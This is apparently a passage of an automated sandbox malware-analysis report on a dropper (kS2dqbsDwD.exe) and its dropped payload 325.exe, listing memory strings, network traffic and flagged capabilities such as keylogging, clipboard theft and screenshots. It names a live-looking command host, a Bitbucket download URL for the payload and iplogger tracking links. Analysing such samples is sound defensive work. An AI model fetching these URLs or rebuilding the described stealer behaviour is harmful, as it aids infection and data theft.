Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp String found in binary or memory: http://yspasenana.xyz:80/
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 325.exe, 0000000E.00000002.363528899.0000000002BB6000.00000004.00000001.sdmp String found in binary or memory: https://api.ip.sb
Source: 325.exe, 0000000E.00000002.363528899.0000000002BB6000.00000004.00000001.sdmp String found in binary or memory: https://api.ip.sb/geoip
Source: 325.exe, 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmp String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: 325.exe, 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmp String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmp String found in binary or memory: https://aui-cdn.atlassian.com
Source: kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
Source: kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmp, kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/c6138a8d-6b23-4fcf-ac63-5ded44dfc386/downloads/cf4ea471-f159-
Source: kS2dqbsDwD.exe, 00000000.00000002.307255166.0000000000943000.00000004.00000001.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/is.gd
Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp String found in binary or memory: https://bitbucket.org/
Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp, kS2dqbsDwD.exe, 00000000.00000003.304898256.00000000008FA000.00000004.00000001.sdmp String found in binary or memory: https://bitbucket.org/luisadoma999/admin/downloads/325.exe
Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp String found in binary or memory: https://bitbucket.org/luisadoma999/admin/downloads/325.exelq
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmp String found in binary or memory: https://d301sr5gafysq2.cloudfront.net;
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp String found in binary or memory: https://get.adob
Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp String found in binary or memory: https://helpx.ad
Source: 325.exe, 0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmp String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: kS2dqbsDwD.exe, 00000000.00000002.307120909.00000000008FA000.00000004.00000001.sdmp String found in binary or memory: https://iplogger.org/
Source: kS2dqbsDwD.exe, kS2dqbsDwD.exe, 00000000.00000002.307120909.00000000008FA000.00000004.00000001.sdmp, kS2dqbsDwD.exe, 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp String found in binary or memory: https://iplogger.org/1Spbs7
Source: kS2dqbsDwD.exe, 00000000.00000003.304864468.00000000008C6000.00000004.00000001.sdmp String found in binary or memory: https://iplogger.org/1Spbs7%A_AppData%
Source: kS2dqbsDwD.exe, 00000000.00000002.307120909.00000000008FA000.00000004.00000001.sdmp String found in binary or memory: https://iplogger.org/1Spbs7e
Source: kS2dqbsDwD.exe, 00000000.00000002.307120909.00000000008FA000.00000004.00000001.sdmp String found in binary or memory: https://iplogger.org/y
Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/
Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/b
Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp, kS2dqbsDwD.exe, 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp String found in binary or memory: https://is.gd/nKi5S3
Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/nKi5S3$
Source: kS2dqbsDwD.exe, 00000000.00000003.304864468.00000000008C6000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/nKi5S3%A_AppData%
Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/nKi5S3H
Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363595455.0000000002BEF000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363606561.0000000002BF3000.00000004.00000001.sdmp String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: kS2dqbsDwD.exe String found in binary or memory: https://sectigo.com/CPS0C
Source: kS2dqbsDwD.exe String found in binary or memory: https://sectigo.com/CPS0D
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: kS2dqbsDwD.exe, 00000000.00000002.307688715.0000000002C10000.00000004.00000001.sdmp String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website;
Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.362868644.0000000000EAF000.00000004.00000020.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, tmp8758.tmp.14.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.3:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.25.234.53:443 -> 192.168.2.3:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.217.201.169:443 -> 192.168.2.3:49715 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400053A0 GetTickCount,OpenClipboard,GetTickCount,OpenClipboard, 0_2_00000001400053A0
Contains functionality to read the clipboard data
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140005280 GetClipboardFormatNameW,GetClipboardData, 0_2_0000000140005280
Contains functionality to record screenshots
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140042E80 GetSystemMetrics,GetSystemMetrics,GetDC,DestroyCursor,DeleteObject,GetIconInfo,DeleteObject,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,ReleaseDC,DeleteObject,SelectObject,DeleteDC,DeleteObject, 0_2_0000000140042E80
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140011052 GetKeyboardState, 0_2_0000000140011052
Creates a DirectInput object (often for capturing keystrokes)
Source: 325.exe, 00000002.00000002.303820429.0000000000B58000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Potential key logger detected (key state polling based)
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400018BA GlobalUnWire,CloseClipboard,SetTimer,GetTickCount,GetTickCount,GetMessageW,GetTickCount,GetFocus,TranslateAcceleratorW,GetKeyState,GetWindowLongW,GetKeyState,GetKeyState,GetKeyState,IsDlgButtonChecked,IsDlgButtonChecked,PostMessageW,IsDlgButtonChecked,IsDlgButtonChecked,IsDialogMessageW,GetTickCount,KillTimer,ShowWindow,GetTickCount,GetForegroundWindow,GetWindowThreadProcessId,GetClassNameW,IsDialogMessageW,SetCurrentDirectoryW,ShowWindow,DragQueryFileW,DragFinish,DragFinish,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CountClipboardFormats,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsDlgButtonChecked,ScreenToClient,IsDlgButtonChecked,IsDlgButtonChecked,GetWindowRect,MulDiv,MulDiv,GetWindowRect,GetWindowRect,GetWindowLongW,SetWindowLongW,MulDiv,MulDiv,IsDlgButtonChecked,ShowWindow,DragFinish,GetWindowLongW,SetWindowLongW, 0_2_00000001400018BA

System Summary:

barindex
.NET source code contains very large strings
Source: 325.exe.0.dr, uNotepad/CollectionToSort.cs Long String: Length: 32771
Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/CollectionToSort.cs Long String: Length: 32771
Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/CollectionToSort.cs Long String: Length: 32771
Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/CollectionToSort.cs Long String: Length: 32771
Sample or dropped binary is a compiled AutoHotkey binary
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Window found: window name: AutoHotkey Jump to behavior
Contains functionality to call native functions
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140043AD0 RegisterClipboardFormatW,MoveWindow,GetSysColor,SetBkColor,SetTextColor,GetSysColorBrush,CreateCompatibleDC,SelectObject,BitBlt,SelectObject,DeleteDC,DrawIconEx,ExcludeClipRect,CreateRectRgn,GetClipRgn,GetSysColorBrush,FillRgn,DeleteObject,GetClipBox,FillRect,GetClientRect,MoveWindow,MoveWindow,MoveWindow,InvalidateRect,ShowWindow,GetMenu,CheckMenuItem,NtdllDefWindowProc_W,SendMessageTimeoutW,PostMessageW,PostMessageW,SendMessageTimeoutW, 0_2_0000000140043AD0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004438A NtdllDefWindowProc_W,PostMessageW, 0_2_000000014004438A
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140043BF6 NtdllDefWindowProc_W, 0_2_0000000140043BF6
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140043C50 NtdllDefWindowProc_W, 0_2_0000000140043C50
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140043C8B SetFocus,NtdllDefWindowProc_W, 0_2_0000000140043C8B
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140043CAC NtdllDefWindowProc_W, 0_2_0000000140043CAC
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140043CD9 NtdllDefWindowProc_W, 0_2_0000000140043CD9
Contains functionality to communicate with device drivers
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400492B0: CreateFileW,DeviceIoControl,CloseHandle, 0_2_00000001400492B0
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400624E0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 0_2_00000001400624E0
Detected potential crypto function
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0095EB07 0_3_0095EB07
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0095EB07 0_3_0095EB07
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0095EB07 0_3_0095EB07
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0095EB07 0_3_0095EB07
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0095EB07 0_3_0095EB07
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0095EB07 0_3_0095EB07
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0095EB07 0_3_0095EB07
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0095EB07 0_3_0095EB07
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0095EB07 0_3_0095EB07
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140019030 0_2_0000000140019030
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140060290 0_2_0000000140060290
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400184C0 0_2_00000001400184C0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140004530 0_2_0000000140004530
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400018BA 0_2_00000001400018BA
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140043AD0 0_2_0000000140043AD0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140036D50 0_2_0000000140036D50
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140014FF0 0_2_0000000140014FF0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400A7FF8 0_2_00000001400A7FF8
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140049040 0_2_0000000140049040
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140053050 0_2_0000000140053050
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D080 0_2_000000014004D080
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140008140 0_2_0000000140008140
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140083150 0_2_0000000140083150
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400861F0 0_2_00000001400861F0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014003C220 0_2_000000014003C220
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140042240 0_2_0000000140042240
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014002B25C 0_2_000000014002B25C
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014000C260 0_2_000000014000C260
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140048270 0_2_0000000140048270
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004B270 0_2_000000014004B270
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014008B280 0_2_000000014008B280
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014000A2B0 0_2_000000014000A2B0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400222C0 0_2_00000001400222C0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400132C0 0_2_00000001400132C0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004C2D0 0_2_000000014004C2D0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400302E0 0_2_00000001400302E0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014000F2E0 0_2_000000014000F2E0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014003A300 0_2_000000014003A300
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140020316 0_2_0000000140020316
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014005E330 0_2_000000014005E330
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014003B32A 0_2_000000014003B32A
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014006C33D 0_2_000000014006C33D
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140033380 0_2_0000000140033380
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140096390 0_2_0000000140096390
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400563A0 0_2_00000001400563A0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400883F0 0_2_00000001400883F0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400B9420 0_2_00000001400B9420
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004A480 0_2_000000014004A480
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400424B0 0_2_00000001400424B0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400414B0 0_2_00000001400414B0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400B04B4 0_2_00000001400B04B4
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400344D0 0_2_00000001400344D0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140059510 0_2_0000000140059510
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014005E580 0_2_000000014005E580
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014002D585 0_2_000000014002D585
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014001D5A9 0_2_000000014001D5A9
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400695C0 0_2_00000001400695C0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400465D0 0_2_00000001400465D0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400665E0 0_2_00000001400665E0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140023630 0_2_0000000140023630
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140058650 0_2_0000000140058650
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014003B654 0_2_000000014003B654
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400AE660 0_2_00000001400AE660
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014006D6A0 0_2_000000014006D6A0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400C2698 0_2_00000001400C2698
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400C26B0 0_2_00000001400C26B0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400C26A8 0_2_00000001400C26A8
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400096E0 0_2_00000001400096E0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140056719 0_2_0000000140056719
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400577A0 0_2_00000001400577A0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400727F0 0_2_00000001400727F0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140054860 0_2_0000000140054860
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014005E8F0 0_2_000000014005E8F0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140030910 0_2_0000000140030910
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014006C920 0_2_000000014006C920
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140006938 0_2_0000000140006938
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014000693C 0_2_000000014000693C
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140006940 0_2_0000000140006940
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004D990 0_2_000000014004D990
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400059D0 0_2_00000001400059D0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014005F9F2 0_2_000000014005F9F2
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140071A10 0_2_0000000140071A10
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140019A2E 0_2_0000000140019A2E
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400BBA40 0_2_00000001400BBA40
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140047AB0 0_2_0000000140047AB0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140060AF0 0_2_0000000140060AF0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140049B40 0_2_0000000140049B40
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400B7B9C 0_2_00000001400B7B9C
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014002FBFC 0_2_000000014002FBFC
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140059C00 0_2_0000000140059C00
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140055C10 0_2_0000000140055C10
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014000CC10 0_2_000000014000CC10
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014005FC25 0_2_000000014005FC25
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140038C50 0_2_0000000140038C50
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004BC60 0_2_000000014004BC60
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400BDCA8 0_2_00000001400BDCA8
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014008BCD0 0_2_000000014008BCD0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140041CD1 0_2_0000000140041CD1
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140045CF0 0_2_0000000140045CF0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400A7D2C 0_2_00000001400A7D2C
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004FD30 0_2_000000014004FD30
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014003ED70 0_2_000000014003ED70
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140079D90 0_2_0000000140079D90
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140065D90 0_2_0000000140065D90
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400A0DC0 0_2_00000001400A0DC0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014002ADE6 0_2_000000014002ADE6
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140035E60 0_2_0000000140035E60
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140090E70 0_2_0000000140090E70
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140067E62 0_2_0000000140067E62
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140051E80 0_2_0000000140051E80
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140042E80 0_2_0000000140042E80
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140060EF0 0_2_0000000140060EF0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014004AF20 0_2_000000014004AF20
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014003CF20 0_2_000000014003CF20
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140010F60 0_2_0000000140010F60
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140046F70 0_2_0000000140046F70
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014001BF80 0_2_000000014001BF80
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140044FB0 0_2_0000000140044FB0
Source: C:\Users\user\AppData\Roaming\325.exe Code function: 2_2_003B944F 2_2_003B944F
Source: C:\Users\user\AppData\Roaming\325.exe Code function: 2_2_003B9D5B 2_2_003B9D5B
Source: C:\Users\user\AppData\Roaming\325.exe Code function: 2_2_00B4C534 2_2_00B4C534
Source: C:\Users\user\AppData\Roaming\325.exe Code function: 2_2_00B4E975 2_2_00B4E975
Source: C:\Users\user\AppData\Roaming\325.exe Code function: 2_2_00B4E978 2_2_00B4E978
Source: C:\Users\user\AppData\Roaming\325.exe Code function: 2_2_028D0450 2_2_028D0450
Source: C:\Users\user\AppData\Roaming\325.exe Code function: 2_2_04E9031C 2_2_04E9031C
Source: C:\Users\user\AppData\Roaming\325.exe Code function: 2_2_04E9C087 2_2_04E9C087
Source: C:\Users\user\AppData\Roaming\325.exe Code function: 2_2_04E9C098 2_2_04E9C098
Source: C:\Users\user\AppData\Roaming\325.exe Code function: 14_2_006B944F 14_2_006B944F
Source: C:\Users\user\AppData\Roaming\325.exe Code function: 14_2_006B9D5B 14_2_006B9D5B
Source: C:\Users\user\AppData\Roaming\325.exe Code function: 14_2_02B4D448 14_2_02B4D448
Source: C:\Users\user\AppData\Roaming\325.exe Code function: 14_2_02B4CB50 14_2_02B4CB50
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\325.exe 20E702B077D7CF9780192671268C321BB0A76BAEC0A731413A1F04F735EEDCE3
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: String function: 00000001400A6D70 appears 354 times
